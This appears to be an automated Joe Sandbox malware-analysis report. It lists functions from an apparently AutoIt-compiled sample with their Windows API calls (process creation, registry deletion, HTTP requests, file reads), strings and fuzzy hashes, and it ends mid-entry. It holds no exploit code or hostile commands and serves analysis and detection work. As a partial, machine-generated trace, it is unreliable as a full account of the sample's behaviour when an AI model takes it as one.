Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 034bae8d938899245861ae2cc107f83a29958530d48eb947f5ce63207eedb44f
Instruction ID: a170e65d928a6f2eaa1a67657a07f1caf6d0a6772aa3df3a736a97ced3bb7312
Opcode Fuzzy Hash: 034bae8d938899245861ae2cc107f83a29958530d48eb947f5ce63207eedb44f
Instruction Fuzzy Hash: BD81E671614715BBDB20AF60DD47FAF77A8AF35300F044029F909AA1D6EBB0DA25CB91

Function 00225A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00225A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00225A40
SetWindowTextW.USER32(?,?), ref: 00225A57
GetDlgItem.USER32(?,000003EA), ref: 00225A6C
SetWindowTextW.USER32(00000000,?), ref: 00225A72
GetDlgItem.USER32(?,000003E9), ref: 00225A82
SetWindowTextW.USER32(00000000,?), ref: 00225A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00225AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00225AC3
GetWindowRect.USER32(?,?), ref: 00225ACC
_wcslen.LIBCMT ref: 00225B33
SetWindowTextW.USER32(?,?), ref: 00225B6F
GetDesktopWindow.USER32 ref: 00225B75
GetWindowRect.USER32(00000000), ref: 00225B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00225BD3
GetClientRect.USER32(?,?), ref: 00225BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00225C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00225C2F

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: f733cb5097717d4aee61a161732c8174c2b76cd941165776002c46ba68afb38a
Instruction ID: 7821cada6686291ab716bd48c3791a3d636f13a71ebbbacc1b6de316a6a5611b
Opcode Fuzzy Hash: f733cb5097717d4aee61a161732c8174c2b76cd941165776002c46ba68afb38a
Instruction Fuzzy Hash: 7B71AF31910B26EFCB20DFA8DE89AAEBBF5FF48705F108518E142A25A4D774E950CF54

Function 002230F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0022318D
_wcslen.LIBCMT ref: 002231F8

Strings

REGEXPCLASS, xrefs: 00223255, 00223266
INSTANCE, xrefs: 00223453
NAME, xrefs: 00223335, 00223346
CLASS, xrefs: 00223188, 002231A5
TEXT, xrefs: 0022347C
CLASSNN, xrefs: 002231F3, 00223204
[(, xrefs: 0022339A

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[(
API String ID: 176396367-3582721924
Opcode ID: c3061b3a4e9a9f03bbfb3e23dc72eb19edd41ac1517058661b42956e4110e834
Instruction ID: 1afc0a62e9120184896ab99703b8038c59aef384f14bf3436d48a896dad84891
Opcode Fuzzy Hash: c3061b3a4e9a9f03bbfb3e23dc72eb19edd41ac1517058661b42956e4110e834
Instruction Fuzzy Hash: FCE10432A20536BBCB18DFE4D4417EDB7A0BF28714F54815AE856A7240DB34AFA5C790

Function 001E00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 001E00C6

Part of subcall function 001E00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0029070C,00000FA0,AA7FB7DD,?,?,?,?,002023B3,000000FF), ref: 001E011C
Part of subcall function 001E00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,002023B3,000000FF), ref: 001E0127
Part of subcall function 001E00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,002023B3,000000FF), ref: 001E0138
Part of subcall function 001E00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 001E014E
Part of subcall function 001E00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 001E015C
Part of subcall function 001E00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 001E016A
Part of subcall function 001E00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001E0195
Part of subcall function 001E00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001E01A0

___scrt_fastfail.LIBCMT ref: 001E00E7

Part of subcall function 001E00A3: __onexit.LIBCMT ref: 001E00A9

Strings

SleepConditionVariableCS, xrefs: 001E0154
WakeAllConditionVariable, xrefs: 001E0162
api-ms-win-core-synch-l1-2-0.dll, xrefs: 001E0122
kernel32.dll, xrefs: 001E0133
InitializeConditionVariable, xrefs: 001E0148

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 52b58d8f72ae90b4af3f0a3dc021bd1e37601d8d45c517a8071835b228cdc6e6
Instruction ID: 4991ff90a2916d21376ac15070da7d4c21806c360f0959c6774147d37663809c
Opcode Fuzzy Hash: 52b58d8f72ae90b4af3f0a3dc021bd1e37601d8d45c517a8071835b228cdc6e6
Instruction Fuzzy Hash: A1212932645B446FD7126BB5BC4DB6E73E4DB09B62F10012AFC01A6291EBB09C408A94

Function 002344C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0025CC08), ref: 00234527
_wcslen.LIBCMT ref: 0023453B
_wcslen.LIBCMT ref: 00234599
_wcslen.LIBCMT ref: 002345F4
_wcslen.LIBCMT ref: 0023463F
_wcslen.LIBCMT ref: 002346A7

Part of subcall function 001DF9F2: _wcslen.LIBCMT ref: 001DF9FD

GetDriveTypeW.KERNEL32(?,00286BF0,00000061), ref: 00234743

Strings

ramdisk, xrefs: 002346F1
cdrom, xrefs: 0023458F, 00234594
removable, xrefs: 002345EA, 002345EF
fixed, xrefs: 00234635, 0023463A
all, xrefs: 00234531, 00234536
network, xrefs: 0023469D, 002346A2
unknown, xrefs: 00234708

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 764d0762e1719d4faa56e618295251d19d894325ff25f835c5febff127a9c44a
Instruction ID: a33cd67f0c29e40bd9f22a0e01bb576fedc47491ea9e4cb52bdea1b5fa4a492d
Opcode Fuzzy Hash: 764d0762e1719d4faa56e618295251d19d894325ff25f835c5febff127a9c44a
Instruction Fuzzy Hash: 3BB111B16283029FC310EF28C891A6EB7E5AFB5724F50495DF496D7291E730E864CB92

Function 0025911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 001D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001D9BB2

DragQueryPoint.SHELL32(?,?), ref: 00259147

Part of subcall function 00257674: ClientToScreen.USER32(?,?), ref: 0025769A
Part of subcall function 00257674: GetWindowRect.USER32(?,?), ref: 00257710
Part of subcall function 00257674: PtInRect.USER32(?,?,00258B89), ref: 00257720

SendMessageW.USER32(?,000000B0,?,?), ref: 002591B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002591BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002591DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00259225
SendMessageW.USER32(?,000000B0,?,?), ref: 0025923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00259255
SendMessageW.USER32(?,000000B1,?,?), ref: 00259277
DragFinish.SHELL32(?), ref: 0025927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00259371

Strings

@GUI_DRAGFILE, xrefs: 00259320
p#), xrefs: 002592BB
@GUI_DROPID, xrefs: 0025929E
@GUI_DRAGID, xrefs: 002592E9

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#)
API String ID: 221274066-855356465
Opcode ID: 145e438f07b38270e7a736cf176866c0d7d7d47c6aae0f7aeb485a54fbd617bb
Instruction ID: 1d37552a58c66df9c4c4c98c5b7f47e571e6fecb2e697b94ac948f02541168e7
Opcode Fuzzy Hash: 145e438f07b38270e7a736cf176866c0d7d7d47c6aae0f7aeb485a54fbd617bb
Instruction Fuzzy Hash: FA618A71108301AFD705DF64DC89EAFBBE8EFA9350F10092EF995921A0DB30DA59CB56

Function 0024AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0024B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0024B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0024B1D4
_wcslen.LIBCMT ref: 0024B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0024B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0024B236
_wcslen.LIBCMT ref: 0024B332

Part of subcall function 002305A7: GetStdHandle.KERNEL32(000000F6), ref: 002305C6

_wcslen.LIBCMT ref: 0024B34B
_wcslen.LIBCMT ref: 0024B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0024B3B6
GetLastError.KERNEL32(00000000), ref: 0024B407
CloseHandle.KERNEL32(?), ref: 0024B439
CloseHandle.KERNEL32(00000000), ref: 0024B44A
CloseHandle.KERNEL32(00000000), ref: 0024B45C
CloseHandle.KERNEL32(00000000), ref: 0024B46E
CloseHandle.KERNEL32(?), ref: 0024B4E3

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: c8769c28911c7acb35f9595115703921df8154e90f54dda942518a658a9a6574
Instruction ID: 96c04722d52f4ab54ee857f696d51389559c311ab618bc67a0b899d5aa0e3235
Opcode Fuzzy Hash: c8769c28911c7acb35f9595115703921df8154e90f54dda942518a658a9a6574
Instruction Fuzzy Hash: F0F1DD316183419FC719EF24C891B2EBBE4AF95314F14895DF8899B2A2DB71EC10CF92

Function 001C326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(00291990), ref: 00202F8D
GetMenuItemCount.USER32(00291990), ref: 0020303D
GetCursorPos.USER32(?), ref: 00203081
SetForegroundWindow.USER32(00000000), ref: 0020308A
TrackPopupMenuEx.USER32(00291990,00000000,?,00000000,00000000,00000000), ref: 0020309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002030A9

Strings

0, xrefs: 001C327D

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 0ef4f39d47757dd56fcfa741dc4c5932c19290e786748d404412f4d831e22f43
Instruction ID: b0d4cc1948d504e624da2769b4cb3fda58688bce1d91051beadca1e921d6524f
Opcode Fuzzy Hash: 0ef4f39d47757dd56fcfa741dc4c5932c19290e786748d404412f4d831e22f43
Instruction Fuzzy Hash: 3C710470640316BEEB258F64DC8DFAABF69FF04364F204207F5256A1E1C7B1A924CB90

Function 00256CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00256DEB

Part of subcall function 001C6B57: _wcslen.LIBCMT ref: 001C6B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00256E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00256E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00256E94
DestroyWindow.USER32(?), ref: 00256EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,001C0000,00000000), ref: 00256EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00256EFD
GetDesktopWindow.USER32 ref: 00256F16
GetWindowRect.USER32(00000000), ref: 00256F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00256F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00256F4D

Part of subcall function 001D9944: GetWindowLongW.USER32(?,000000EB), ref: 001D9952

Strings

0, xrefs: 00256D98
tooltips_class32, xrefs: 00256E58, 00256EDD

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 66b4a78e83196f53cd562e174e3974cea1ae6e3152422693ad41b0a3d6c90e6a
Instruction ID: 4de267f5ca1e54cb1266b9faaa4cefc28974bfa1dbadcf754fe52d8521cb6ef7
Opcode Fuzzy Hash: 66b4a78e83196f53cd562e174e3974cea1ae6e3152422693ad41b0a3d6c90e6a
Instruction Fuzzy Hash: F7717870504341AFEB25CF18E848FAABBE9EB99305F54051EF98987260D770ED1ACB19

Function 0023C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0023C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0023C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0023C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0023C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0023C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0023C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0023C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0023C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0023C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0023C5F0
InternetCloseHandle.WININET(00000000), ref: 0023C5FB

Strings

, xrefs: 0023C575

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: aef2586ffcc72167d8906f0a4b124189716cd792dcb0dedca0cff841ee02fd68
Instruction ID: e5baa79ddf84d8114741ff97c0c15da9af4f70e4a34c3005d8c74243873aa56a
Opcode Fuzzy Hash: aef2586ffcc72167d8906f0a4b124189716cd792dcb0dedca0cff841ee02fd68
Instruction Fuzzy Hash: 275169B1510309BFDB218F60DD88AABBBBCFB08755F60441AF945E6610EB30E954DB60

Function 0025856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00258592
GetFileSize.KERNEL32(00000000,00000000), ref: 002585A2
GlobalAlloc.KERNEL32(00000002,00000000), ref: 002585AD
CloseHandle.KERNEL32(00000000), ref: 002585BA
GlobalLock.KERNEL32(00000000), ref: 002585C8
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 002585D7
GlobalUnlock.KERNEL32(00000000), ref: 002585E0
CloseHandle.KERNEL32(00000000), ref: 002585E7
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 002585F8
OleLoadPicture.OLEAUT32(?,00000000,00000000,0025FC38,?), ref: 00258611
GlobalFree.KERNEL32(00000000), ref: 00258621
GetObjectW.GDI32(?,00000018,000000FF), ref: 00258641
CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00258671
DeleteObject.GDI32(00000000), ref: 00258699
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002586AF

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 063683ec894ae15c119adfd8054cf0e9d12c9dc3e226dac777167d9960d91d1e
Instruction ID: f279462d1153b8d0fd09cb7e7a9552e9e97f93bdd6136dbb4ef997124e4b2962
Opcode Fuzzy Hash: 063683ec894ae15c119adfd8054cf0e9d12c9dc3e226dac777167d9960d91d1e
Instruction Fuzzy Hash: 8B41E975610309AFDB119FA5DC4CEAA7BBCEB89712F108058F909E7260EB709945CF68

Function 002314BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00231502
VariantCopy.OLEAUT32(?,?), ref: 0023150B
VariantClear.OLEAUT32(?), ref: 00231517
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 002315FB
VarR8FromDec.OLEAUT32(?,?), ref: 00231657
VariantInit.OLEAUT32(?), ref: 00231708
SysFreeString.OLEAUT32(?), ref: 0023178C
VariantClear.OLEAUT32(?), ref: 002317D8
VariantClear.OLEAUT32(?), ref: 002317E7
VariantInit.OLEAUT32(00000000), ref: 00231823

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 00231625
Default, xrefs: 002316AF

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 1234038744-3931177956
Opcode ID: 642b87711ef4da05862b01b8e2a66bba89992291bd4beb57ba785f7366a4bb94
Instruction ID: 6fa39067745a014571b0ac358fb5b91d53f57ec489d3bc44982603c3a864e99e
Opcode Fuzzy Hash: 642b87711ef4da05862b01b8e2a66bba89992291bd4beb57ba785f7366a4bb94
Instruction Fuzzy Hash: EDD112B1A20205EBDB10EF65E889B7DB7B5BF44700F64845AF406AB280DB70ED71DB61

Function 0024B60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD

Part of subcall function 0024C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0024B6AE,?,?), ref: 0024C9B5
Part of subcall function 0024C998: _wcslen.LIBCMT ref: 0024C9F1
Part of subcall function 0024C998: _wcslen.LIBCMT ref: 0024CA68
Part of subcall function 0024C998: _wcslen.LIBCMT ref: 0024CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0024B6F4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0024B772
RegDeleteValueW.ADVAPI32(?,?), ref: 0024B80A
RegCloseKey.ADVAPI32(?), ref: 0024B87E
RegCloseKey.ADVAPI32(?), ref: 0024B89C
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0024B8F2
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0024B904
RegDeleteKeyW.ADVAPI32(?,?), ref: 0024B922
FreeLibrary.KERNEL32(00000000), ref: 0024B983
RegCloseKey.ADVAPI32(00000000), ref: 0024B994

Strings

advapi32.dll, xrefs: 0024B8ED
RegDeleteKeyExW, xrefs: 0024B8FE

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: b0ff5f23711ff42b154ad5c6ec18f65649026a5074634dfcddb2bed9d68dbb1d
Instruction ID: 8babad650adb0ddc0fda862d0b38de4cd7e7867578fcf35429aee6f6adb6684e
Opcode Fuzzy Hash: b0ff5f23711ff42b154ad5c6ec18f65649026a5074634dfcddb2bed9d68dbb1d
Instruction Fuzzy Hash: F8C19C35218202AFD719DF24C495F2ABBE5BF94318F14845CF49A8B2A2CB71EC56CF91

Function 0024255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 002425D8
